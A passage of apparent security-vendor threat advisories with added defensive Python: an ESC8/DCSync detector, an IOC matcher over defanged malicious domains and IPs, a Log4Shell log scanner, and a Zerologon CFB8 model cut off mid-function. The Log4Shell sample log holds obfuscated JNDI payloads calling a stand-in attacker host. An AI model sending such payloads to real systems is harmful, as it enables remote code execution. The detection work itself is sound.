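    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4776, "TargetUserName": "WS01$", "Workstation": "WS01"},
    {"EventID": 4776, "TargetUserName": "DC01$", "Workstation": "SRV-UNKNOWN"},
    {"EventID": 4886, "Requester": "CONTOSO\\DC01$", "Attributes": "CertificateTemplate:DomainController"},
    {"EventID": 4887, "Requester": "CONTOSO\\DC01$", "Attributes": "CertificateTemplate:DomainController"},
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.1.20", "CertIssuerName": ""},
    {"EventID": 4768, "TargetUserName": "DC01$", "IpAddress": "::ffff:10.0.1.99", "CertIssuerName": "contoso-CA"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-backup", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def _account(name):
    """Strip a DOMAIN\\ prefix so 'CONTOSO\\DC01$' and 'DC01$' compare equal."""
    return name.rsplit("\\", 1)[-1]


def _ip(address):
    """4768 logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return address.replace("::ffff:", "")


def _requests_replication(properties):
    text = properties.lower()
    return any(guid in text for guid in REPLICATION_GUIDS)


def detect_esc8_chain(events, min_stages=3):
    """Return (account, message) alerts for chained ESC8 stages and for DCSync by non-DCs."""
    stages = {}   # account -> set of chain stages observed
    alerts = []

    def mark(account, stage):
        stages.setdefault(account, set()).add(stage)

    for ev in events:
        eid = ev["EventID"]
        if eid == 4776:
            acct = _account(ev["TargetUserName"])
            # A machine account normally validates NTLM from its own host; any other
            # workstation name is consistent with coerced and relayed authentication.
            if acct.endswith("$") and ev["Workstation"].upper() != acct[:-1].upper():
                mark(acct, "ntlm_from_foreign_host")
        elif eid in (4886, 4887):
            acct = _account(ev["Requester"])
            if acct in DC_ACCOUNTS:
                mark(acct, "certificate_requested" if eid == 4886 else "certificate_issued")
        elif eid == 4768:
            acct = _account(ev["TargetUserName"])
            # CertIssuerName is only populated for certificate (PKINIT) pre-authentication.
            if ev.get("CertIssuerName") and acct in DC_ACCOUNTS and _ip(ev["IpAddress"]) not in DC_ADDRESSES:
                mark(acct, "pkinit_from_non_dc_address")
        elif eid == 4662 and _requests_replication(ev["Properties"]):
            acct = _account(ev["SubjectUserName"])
            if acct in DC_ACCOUNTS:
                mark(acct, "directory_replication")
            else:
                alerts.append((acct, "replication rights exercised by a non-DC principal (DCSync)"))

    for acct, seen in stages.items():
        if len(seen) >= min_stages:
            alerts.append((acct, "ESC8 chain: " + ", ".join(sorted(seen))))
    return alerts
```

On the constructed events DC01$ accumulates all five stages and is alerted on, DC02$ only replicates (normal DC behaviour) and stays quiet, and svc-backup triggers the DCSync rule on its own. The `min_stages` threshold is the tuning knob: lowering it to 2 catches the chain before the DCSync step at the cost of alerting on a DC that merely renewed its certificate after an NTLM hiccup.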

Mitigations and Next Steps

  1. Disable NTLM Authentication on your Windows domain controller and on any AD CS Servers in your domain.
  2. Disable HTTP on AD CS servers. (AD CS Web Enrollment)
  3. Enable Extended Protection for Authentication (EPA) on the AD CS web enrollment sites and require TLS (HTTPS) for them.
  4. Enable detailed logging of certificate requests and enrolments on the CA Server.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

December 2024 Threat Advisory – Top 5 https://www.securityhq.com/blog/december-2024-threat-advisory-top-5/ Mon, 16 Dec 2024 14:06:24 +0000 https://www.securityhq.com/?p=11636 SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of December 2024.

Two New Variants of Remcos RAT Identified in Recent Malware Campaigns

Threat Reference: Global

Risks: Malware

Advisory Type: Threats

Priority: Standard

The Remcos Remote Access Trojan (RAT) is a growing cybersecurity threat that primarily spreads through the use of phishing emails containing malicious attachments. Two new variants of the RAT have recently been uncovered. One variant is seen using VBS files to trigger hidden PowerShell scripts to download and execute malicious files. The second variant uses malicious attachments to exploit older vulnerabilities (CVE-2017-11882) in Microsoft Office to install the RAT.

Attack Scenario, Variant 1

1. The VBS file triggers an obfuscated PowerShell script on the victim’s system, which downloads malicious files (e.g., DLL01.txt, Entry.txt) from a command-and-control (C2) server via FTP server or Google Drive.

2. The PowerShell script checks the installed version, and once downloaded, the files are decoded, and the malicious payload is executed. The payload is injected into a legitimate system process, RegAsm.exe, a Microsoft .NET executable file.

3. The Remcos keylogger payload is loaded into memory, and the keylogger monitors the victim’s activity by logging all keystrokes.

4. The malware creates a registry entry under HKCU (HKEY_CURRENT_USER) Run for persistence and a misleadingly named directory in AppData\Local\Microsoft\LocalLow to hide the malicious files from detection.

5. The captured data, including keystrokes, is stored in %ProgramData%\1210\logs.dat and exfiltrated to the C2 server. The malware maintains continuous communication with the C2 server, which can deliver payloads, receive stolen data, or issue commands to control the system.

Attack Scenario, Variant 2

1. This variant is delivered through a spam email with a malicious Office Open XML Document (.docx) file.

2. The document uses a long filename designed to trick the victim into opening it.

3. The document contains a reference to an external URL, which downloads an RTF file exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, allowing remote code execution.

4. The RTF file downloads a highly obfuscated VBS script. The payload includes a .NET DLL (dnlib.dll), which is loaded into memory via PowerShell without writing to disk to evade detection. After that, the Remcos RAT follows the usual malicious activities.

Indicators of compromise (IOCs). Domains/URLs:

  • dealc[.]me/NLizza
  • raw[.]githubusercontent[.]com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V[.]txt
  • 91[.]134[.]96[.]177/70/RGGFVC[.]txt
  • 91[.]134[.]96[.]177/70/picturewithmegetbacktouse[.]tIF

Recommendations

  1. Implement Multi-Factor Authentication to significantly reduce the risk of successful logins with stolen credentials.
  2. Deploy Endpoint Detection and Response (EDR) solutions to identify and respond to suspicious activity, ideally stopping the chain before the RAT establishes persistence.
  3. Keep regular data backups stored securely offline for recovery in case of a destructive follow-on attack.
  4. Prioritize and apply security patches promptly; CVE-2017-11882 is years old and is still being exploited.
  5. Educate employees to identify phishing attempts and other social engineering tactics used to gain initial access.
  6. Conduct regular security assessments to identify and address potential weaknesses in your IT infrastructure.

71 Vulnerabilities, Including 30 Remote Code Execution Flaws in Microsoft’s Dec Patch Tuesday

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for December 2024, addressing 71 security vulnerabilities, including one zero-day and 30 remote code execution vulnerabilities.

Successful exploitation of these vulnerabilities could lead to remote code execution, privilege escalation, security feature bypass, information disclosure, denial of service, and spoofing.

Affected products include Microsoft Office, Microsoft Edge, Microsoft Defender for Endpoint, Microsoft Office SharePoint, Microsoft Office Word, Windows Task Scheduler, Windows Resilient File System (ReFS), and GitHub.

Notable CVEs Include:

  • [Zero-Day] – CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege Vulnerability
  • [Critical] – CVE-2024-49115 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49116 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49117 – Windows Hyper-V Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49118 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49119 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49120 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49122 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49123 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49124 – Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49126 – Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49127 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49128 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49132 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49106 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49108 – Windows Remote Desktop Services Remote Code Execution Vulnerability
  • [Critical] – CVE-2024-49112 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

View the full list, here.

Recommendations

Update all affected products to the latest available patch version.

SecurityHQ Recommendation for Microsoft Default Teams External Access Hardening – Addendum

Threat Reference: Global

Risks: Phishing, Spoofing, Ransomware

Advisory Type: Threats

Priority: Standard

While this advisory revisits insights shared in November 2024, it reflects new campaign developments observed since October 2024, necessitating immediate review and enhancement of security settings.

SecurityHQ has observed a resurgence in targeted social engineering attacks exploiting Microsoft Teams’ external access settings. Threat actors such as Storm-1811 and Black Basta are leveraging these settings to initiate contact with victims, using display names like “Help Desk Manager” or impersonating internal IT staff. After gaining the victim’s trust, attackers manipulate them into downloading remote desktop tools such as AnyDesk, Quick Assist, or TeamViewer, enabling unauthorized system access and further malicious activity.

By default, Microsoft Teams allows external users to initiate chats and share files with corporate accounts. This configuration is exploited by these actors to execute sophisticated attacks.

Key Threat Actor Tactics

• Storm-1811

1. Initial Contact: Floods the victim’s inboxes with spam (email bombing) to create urgency.

2. Impersonation: Poses as an IT administrator via Microsoft Teams or phone calls.

3. Exploitation: Guides users to install RMM tools and establishes SSH tunnel backdoors for persistence and reconnaissance.

• Black Basta

1. Initial Contact: Overloads inboxes with spam and follows up via Teams, impersonating IT staff.

2. Credential Harvesting: Deploys obfuscated malware (e.g., Zbot, DarkGate) and custom harvesters for rapid credential theft.

3. Payload Delivery: Uses compromised cloud services or direct uploads to deploy ransomware payloads.

Risk and Exploits

While Microsoft Teams requires users to accept chat requests before viewing messages from external accounts, this safeguard is easily bypassed through spoofed corporate accounts, urgent scenarios, and trusted source impersonation.

The SecurityHQ team has also added recently observed Indicators of Compromise (IOCs) related to the Abuse of Teams External Access Feature in an internal investigation.

Indicators of compromise (IOCs). IP Addresses:

  • 185[.]130[.]47[.]96
  • 65[.]87[.]7[.]151
  • 66[.]78[.]40[.]86
  • 184[.]174[.]97[.]32
  • 212[.]232[.]22[.]140
  • 8[.]209[.]111[.]227
  • 8[.]211[.]34[.]166
  • 109[.]172[.]88[.]38
  • 109[.]172[.]87[.]135
  • 188[.]130[.]206[.]243
  • 46[.]8[.]232[.]106
  • 46[.]8[.]236[.]61
  • 91[.]212[.]166[.]91
  • 93[.]185[.]159[.]253
  • 94[.]103[.]85[.]114
  • 193[.]29[.]13[.]60
  • 88[.]214[.]25[.]32
  • 147[.]28[.]163[.]206
  • 45[.]61[.]152[.]154
  • 185[.]229[.]66[.]224
  • 172[.]81[.]60[.]122
  • 145[.]223[.]116[.]66
  • 185[.]238[.]169[.]17
  • 179[.]60[.]149[.]194
  • 178[.]236[.]247[.]173
  • 38[.]180[.]192[.]243
  • 45[.]8[.]157[.]162
  • 45[.]8[.]157[.]158
  • 195[.]123[.]233[.]148
  • 89[.]185[.]80[.]170
  • 195[.]211[.]96[.]135

Domains/URLs:

  • youadmin.onmicrosoft[.]com
  • delparqueflats[.]com
  • bilipow.onmicrosoft[.]com
  • brandonsupport.onmicrosoft[.]com
  • cofincafe[.]com
  • cybersecurityadmin.onmicrosoft[.]com
  • cybershieldassist.onmicrosoft[.]com
  • databreachsupport.onmicrosoft[.]com
  • endpointshield.onmicrosoft[.]com
  • eps.udg.edu
  • filtrocorp[.]com
  • helpadministrator.onmicrosoft[.]com
  • itsecurityassistance.onmicrosoft[.]com
  • itusaacademy[.]com
  • malwareremovalassistance.onmicrosoft[.]com
  • networksecuritymonitoring.onmicrosoft[.]com
  • pereirabrito[.]com.br
  • safesoc.onmicrosoft[.]com
  • securitypatching.onmicrosoft[.]com
  • servicedeskadmin.onmicrosoft[.]com
  • spamprotectionmanager.onmicrosoft[.]com
  • spamprotections.onmicrosoft[.]com
  • supporthelper.onmicrosoft[.]com
  • supporthelpspam.onmicrosoft[.]com
  • supportteamsservice.onmicrosoft[.]com
  • llladminllll.onmicrosoft[.]com
  • hegss.onmicrosoft[.]com
  • llladminhlpll.onmicrosoft[.]com
  • 1helpyou.onmicrosoft[.]com
  • truehalp.onmicrosoft[.]com
  • adminsteams.onmicrosoft[.]com
  • asssistingyou.onmicrosoft[.]com
  • suporting.onmicrosoft[.]com
  • hprsynergyengineering.onmicrosoft[.]com
  • bevananda[.]com
  • sslip[.]io
  • *.doc[.]docu-duplicator[.]com
  • *.doc1[.]docu-duplicator[.]com
  • *.doc2[.]docu-duplicator[.]com
  • dns[.]winsdesignater[.]com
  • crystallakehotels[.]com
  • summerrain[.]cloud
  • mailh[.]org
  • file[.]io
  • bigdealcenter[.]world
  • brownswer[.]com
  • blazingradiancesolar[.]com
  • posetoposeschool[.]com
  • arifgrouporg-my[.]sharepoint[.]com
  • binusianorg-my[.]sharepoint[.]com
  • dropmeafile[.]com
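Indicator lists like the two in this advisory are published defanged, mix bare IPs, domains, wildcard domains and full URLs, and (as above) are not always defanged consistently, so matching them against logs needs a little normalisation. The added example below (not SecurityHQ code) refangs a subset of the Remcos and Teams-abuse indicators exactly as published, sorts them by how each kind must be matched (exact host, subdomain suffix, or host plus path prefix), and runs them over proxy and DNS log lines. The log lines and their format are constructed.

```python
"""Refang the indicators published above and match them against proxy and DNS logs.

Added example, not SecurityHQ code. The indicator entries are a subset of
the advisory's lists, defanged as published; the log lines are constructed.
"""
import ipaddress
from urllib.parse import urlsplit


def refang(indicator):
    """Undo publication defanging: [.] -> . and hxxp -> http."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip()


# Subset of the advisory's IOCs, exactly as published (defanged).
RAW_IOCS = [
    "dealc[.]me/NLizza",
    "91[.]134[.]96[.]177/70/RGGFVC[.]txt",
    "supporthelper.onmicrosoft[.]com",
    "*.doc[.]docu-duplicator[.]com",
    "178[.]236.247[.]173",   # defanged inconsistently in the published list
    "185[.]130[.]47[.]96",
]


class IocSet:
    """Indicators sorted by how they must be matched."""

    def __init__(self, raw_indicators):
        self.ips, self.hosts, self.suffixes, self.urls = set(), set(), set(), set()
        for raw in raw_indicators:
            value = refang(raw)
            if "/" in value:                      # URL: host plus path prefix
                host, _, path = value.partition("/")
                self.urls.add((host.lower(), "/" + path))
            elif value.startswith("*."):          # wildcard: host and all subdomains
                self.suffixes.add(value[2:].lower())
            else:
                try:
                    self.ips.add(str(ipaddress.ip_address(value)))
                except ValueError:
                    self.hosts.add(value.lower())

    def match(self, host, path="/"):
        host = host.lower()
        if host in self.ips or host in self.hosts:
            return True
        if any(host == s or host.endswith("." + s) for s in self.suffixes):
            return True
        return any(host == h and path.startswith(p) for h, p in self.urls)


# Constructed log lines: "<timestamp> <client> <verb> <target>", where target is a
# URL for GET/POST, host:port for CONNECT and a bare name for DNS.
SAMPLE_LOG = """\
2024-12-10T10:01:02Z 10.0.0.15 GET http://dealc.me/NLizza
2024-12-10T10:01:05Z 10.0.0.15 GET http://91.134.96.177/70/RGGFVC.txt
2024-12-10T10:01:09Z 10.0.0.21 GET https://raw.githubusercontent.com/python/cpython/main/README.rst
2024-12-10T10:02:00Z 10.0.0.33 DNS abc.doc.docu-duplicator.com
2024-12-10T10:02:30Z 10.0.0.33 CONNECT 178.236.247.173:443
2024-12-10T10:03:00Z 10.0.0.40 DNS supporthelper.onmicrosoft.com
2024-12-10T10:03:10Z 10.0.0.40 DNS contoso.onmicrosoft.com
"""


def scan_log(log_text, iocs):
    """Return (timestamp, client, target) for every line that touches an indicator."""
    hits = []
    for line in log_text.splitlines():
        ts, client, verb, target = line.split(" ", 3)
        if verb in ("GET", "POST"):
            parts = urlsplit(target)
            host, path = parts.hostname or "", parts.path or "/"
        elif verb == "CONNECT":
            host, path = target.rsplit(":", 1)[0], "/"   # host:port (IPv4 or name)
        else:
            host, path = target, "/"
        if iocs.match(host, path):
            hits.append((ts, client, target))
    return hits


def scan_sample():
    return scan_log(SAMPLE_LOG, IocSet(RAW_IOCS))
```

Note the two deliberate non-matches: the raw.githubusercontent.com line is benign because the published indicator is a specific path on that host, not the host itself, and contoso.onmicrosoft.com is not flagged because the onmicrosoft.com tenants in the list are exact hosts, not a wildcard. Keeping those distinctions is what separates an IOC sweep from a flood of false positives on shared infrastructure.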

Recommendations

Check whether your current Teams external access settings allow external users to initiate chat messages. Restricting access for external users is strongly recommended.

Step 1: Log in to the Microsoft Teams admin center.

Step 2: Go to the external access setting and scroll down.

Step 3: Uncheck “People in my organization can communicate with Teams users whose accounts aren’t managed by an organization”.

Step 4: Click on save and confirm the changes.

Once you have saved the changes, they can take some time to propagate.

Ivanti Patched Multiple Critical and High-Severity Vulnerabilities

Threat Reference: Global

Risks: Arbitrary File Deletion, Unauthorized access, Remote code execution, Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that Ivanti has released fixes for multiple high and critical severity vulnerabilities affecting multiple Ivanti products. Successful exploitation of these vulnerabilities may allow an attacker to perform arbitrary file deletion, gain unauthorized access, achieve remote code execution, or cause a denial of service (DoS).

Affected Products include Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Policy Secure (IPS), Ivanti Connect Secure (ICS), Ivanti Sentry, Ivanti Endpoint Manager, Ivanti Security Controls, Ivanti Patch for Configuration Manager, Ivanti Neurons for Patch Management, and Ivanti Neurons Agent Platform.

Notable CVE’s:

  • [Critical] CVE-2024-11633- Argument injection in Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution
  • [Critical] CVE-2024-11634- Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
  • [Critical] CVE-2024-11639 – An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access
  • [Critical] CVE-2024-11772 – Command injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
  • [Critical] CVE-2024-11773 – SQL injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

SecurityHQ was not able to identify any evidence of these vulnerabilities being exploited in the wild nor any association with the Advanced Persistent Threat (APT) group or malware variant.  

Recommendation

Update all the affected products to the latest available patch version.

Adobe Released Security Updates to Address 161 Security Vulnerabilities Across Products with Critical and Important Severity.

Threat Reference: Global

Risks: Cross-site Scripting (XSS), Stack-based Buffer Overflow, Heap-based Buffer Overflow, and Improper Input Validation.

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released patches addressing a total of 161 new security vulnerabilities across multiple Adobe products, of which 45 are rated critical and 116 important. The updates mitigate flaws that could allow cross-site scripting (XSS), stack-based and heap-based buffer overflows, and improper input validation.

Affected Products include Adobe Experience Manager (AEM), Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020, Adobe Media Encoder, Adobe After Effects, Adobe Animate 2023, Adobe Animate 2024, Adobe InDesign, Adobe PDFL Software Development Kit (SDK), Adobe Connect, Adobe Substance 3D Sampler, Photoshop 2025, Adobe Bridge, Adobe Premiere Pro, Adobe Substance 3D Painter, and Adobe FrameMaker.

Recommendation

Update all the affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

November 2024 Threat Advisory – Top 5 https://www.securityhq.com/blog/november-2024-threat-advisory-top-5/ Wed, 20 Nov 2024 12:55:45 +0000 https://www.securityhq.com/?p=11452 SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of November 2024.

The Emergence of Interlock Ransomware

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

SecurityHQ has identified the emergence of a new ransomware strain, Interlock. This ransomware targets Windows systems and is known for its stealthy operations and methodical approach to encrypting files. After gaining initial access through phishing emails containing malicious links, Interlock utilizes ransom notes that threaten to expose sensitive information unless a ransom is paid. The malware then encrypts files and appends specific file extensions to indicate encryption, whilst employing a sophisticated blend of evasion techniques to avoid detection.

Interlock ransomware is believed to have originated from a Russian-speaking cybercrime group. The attack vectors and deployment methods indicate that the threat actors behind Interlock are experienced and familiar with various ransomware distribution strategies. While the precise origins and initial release timeline remain unclear, the ransomware has been observed spreading in targeted campaigns against high-value organizations.

Affected systems: Windows operating systems. File types targeted for encryption include Microsoft Office documents, databases, and image formats. Sectors observed being targeted include financial institutions, healthcare organizations, and government entities.

Recommendations:

SecurityHQ has identified several measures to reduce risk: enforce Multi-Factor Authentication, deploy Endpoint Detection and Response solutions, maintain regular backups that are kept offline and tested for restoration, address known vulnerabilities promptly, train employees to recognise phishing, and carry out regular security assessments.

Adobe Released Security Updates to Patch Multiple Critical and Important Severity Vulnerabilities across Adobe Products

Threat Reference: Global

Risks: Arbitrary Code Execution, Memory Leak, Application Denial-of-Service

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released security updates to fix multiple critical and important severity vulnerabilities across its products. Successful exploitation of these vulnerabilities could result in memory leak, arbitrary code execution, and application denial-of-service.

Affected products include Adobe After Effects, Adobe Substance 3D Painter, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, and Adobe Commerce.

Notable CVEs:

  • [Critical] CVE-2024-47441 – Out-of-bounds Write – The software writes data past the end, or before the beginning, of the buffer it intended to write to. The stray write corrupts adjacent memory and can lead to crashes or, when triggered by a crafted file, to arbitrary code execution.
  • [Critical] CVE-2024-49521 – Server-Side Request Forgery (SSRF) – A web security vulnerability in which an attacker induces the server-side application to make requests to an attacker-chosen destination, typically internal services that are not reachable from outside.
  • [Critical] CVE-2024-49525 – Heap-based Buffer Overflow – Data written to a heap-allocated buffer exceeds its size and overwrites neighbouring heap objects or allocator metadata. Attackers use this to corrupt data, crash the application, or gain code execution.

Recommendations:

Update all affected products to the latest available patch version.

Joint Agency Advisory: Increased Threat of Zero-Day Exploits Targeting Enterprise Vulnerabilities

Threat Reference: Global

Risks: Code Injection, Privilege Escalation, Heap-Based Buffer Overflow, SQL Injection, Remote Code Execution

Advisory Type: Updates/Patches

Priority: Standard

In a joint advisory published by NCSC, CISA, and allied agencies, experts warn of a surge in the exploitation of zero-day vulnerabilities by cyber attackers, including state-sponsored and financially motivated groups. Both newly disclosed and long-known vulnerabilities are being weaponized rapidly, leaving unpatched systems particularly exposed.

Agencies note a shift toward swift exploitation tactics and are advising organizations to bolster defenses by promptly patching and reducing their attack surfaces. Key industries such as government, finance, and critical infrastructure are primary targets.

Notable CVEs

  • CVE-2021-44228 (“Log4Shell”): RCE in Apache Log4j, heavily exploited – An attacker places a crafted lookup string (a JNDI reference such as ${jndi:ldap://…}) in any input the application logs. Vulnerable Log4j 2 versions resolve the lookup, fetching and executing attacker-supplied code, which gives the attacker full control of the system to steal information, deploy ransomware, and more.

  • CVE-2019-0708 (“BlueKeep”): RCE in Windows Remote Desktop Services, critical impact – A pre-authentication, wormable flaw in Remote Desktop Services on older Windows versions (Windows 7, Windows Server 2008 and 2008 R2, and earlier). An unauthenticated attacker sending crafted RDP requests can execute arbitrary code and take full control of the system.

  • CVE-2020-1472 (“Zerologon”): Elevation to domain administrator through the Netlogon Remote Protocol – Netlogon authenticates computer accounts using AES-CFB8 with an all-zero initialisation vector. For roughly 1 in every 256 session keys, encrypting an all-zero challenge produces an all-zero ciphertext, so an attacker who repeatedly submits all-zero challenges and credentials is accepted within a few hundred attempts without knowing any password, and can then reset the domain controller’s computer account password and take over the domain.

Visit here for the full list.
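The Log4Shell entry above notes that the attack succeeds as soon as a crafted lookup string is logged. As an added example, which is not code from the SecurityHQ advisory or from the Log4j project, the Python below scans constructed web-server log lines for JNDI lookups. Before matching, it collapses the lower/upper and default-value (${x:-y}) lookups that attackers nest to hide the literal word jndi from naive signatures. The log lines, IP addresses and function names are constructed for this example.

```python
import re

# Innermost ${...} lookup: contains no nested braces or dollar signs.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we want to see once the obfuscation has been unwound.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j 2.x would, for the lookups
    attackers use to split up the word 'jndi'."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)                 # keep: this is the payload itself
    if ":-" in body:                          # ${env:NaN:-j} -> 'j' (default value)
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):              # ${lower:J} -> 'j'
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):              # ${upper:j} -> 'J'
        return body[len("upper:"):].upper()
    return body                               # any other lookup: drop the wrapper


def normalize(text, max_rounds=20):
    """Resolve innermost lookups repeatedly until the text stops changing, so
    nested obfuscation such as ${${lower:j}ndi:...} collapses to ${jndi:...}."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(text):
    """True when the line contains a JNDI lookup after de-obfuscation."""
    return JNDI.search(normalize(text)) is not None


def scan_log(lines):
    """Return (line number, normalized line) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append((number, normalize(line)))
    return hits


# Constructed access-log lines (hypothetical hosts and addresses).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 90 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.9/x}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /api HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.9/y}"',
    '10.0.0.10 - - [10/Dec/2021:10:00:05 +0000] "GET /t?s=${price} HTTP/1.1" 200 10 "-" "curl/7.68.0"',
    '10.0.0.11 - - [10/Dec/2021:10:00:06 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.9/z}"',
]

if __name__ == "__main__":
    for number, normalized in scan_log(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

Lines 2, 3, 4 and 6 of the sample are flagged; the benign ${price} on line 5 is not. This unwinds only the lookups attackers commonly use for obfuscation; raw HTTP logs may additionally need URL-decoding before the scan, and detection of this kind is a stop-gap while the Log4j upgrade is rolled out, not a replacement for it.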

Recommendations:

Update all the affected products to the latest available patch version.
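The Zerologon entry above compresses the cryptographic flaw into one sentence. As an added example, not code from the advisory or from Microsoft, the Python below models Netlogon’s use of AES-CFB8 with an all-zero IV and shows why an all-zero challenge yields an all-zero credential for about 1 key in 256. Two assumptions are made: the AES block encryption is replaced by a keyed SHA-256 stand-in (the structural result is the same with AES, because it depends only on the first byte of the cipher’s output for an all-zero block), and the per-attempt session keys are constructed from a seed rather than derived from a real computer account password.

```python
import hashlib

BLOCK_SIZE = 16
ZERO_IV = bytes(BLOCK_SIZE)
ZERO_CHALLENGE = bytes(8)        # attacker-chosen all-zero client challenge


def toy_block_encrypt(key, block):
    """Assumption: stand-in for AES-128 block encryption (keyed SHA-256
    truncated to one block). Not a real cipher; all the demonstration needs
    is that, like AES, its output for a fixed input looks random across keys."""
    assert len(block) == BLOCK_SIZE
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key, iv, plaintext):
    """CFB8 as Netlogon uses it: each plaintext byte is XORed with the first
    byte of E_k(shift register); the register then shifts left by one byte
    and the new ciphertext byte is appended on the right."""
    register = bytearray(iv)
    ciphertext = bytearray()
    for p in plaintext:
        keystream_byte = toy_block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        ciphertext.append(c)
        register = register[1:] + bytes([c])
    return bytes(ciphertext)


def cfb8_decrypt(key, iv, ciphertext):
    """Inverse of cfb8_encrypt; the register is fed ciphertext bytes in both directions."""
    register = bytearray(iv)
    plaintext = bytearray()
    for c in ciphertext:
        keystream_byte = toy_block_encrypt(key, bytes(register))[0]
        plaintext.append(c ^ keystream_byte)
        register = register[1:] + bytes([c])
    return bytes(plaintext)


def first_keystream_byte_is_zero(key):
    """The single condition Zerologon relies on: E_k(0^16)[0] == 0,
    which holds for roughly 1 key in 256."""
    return toy_block_encrypt(key, ZERO_IV)[0] == 0


def credential_is_all_zero(key):
    """With a zero IV and a zero challenge, a zero first keystream byte leaves
    the register all-zero, so every later keystream byte is again E_k(0)[0] = 0
    and the whole 8-byte credential comes out as zeros."""
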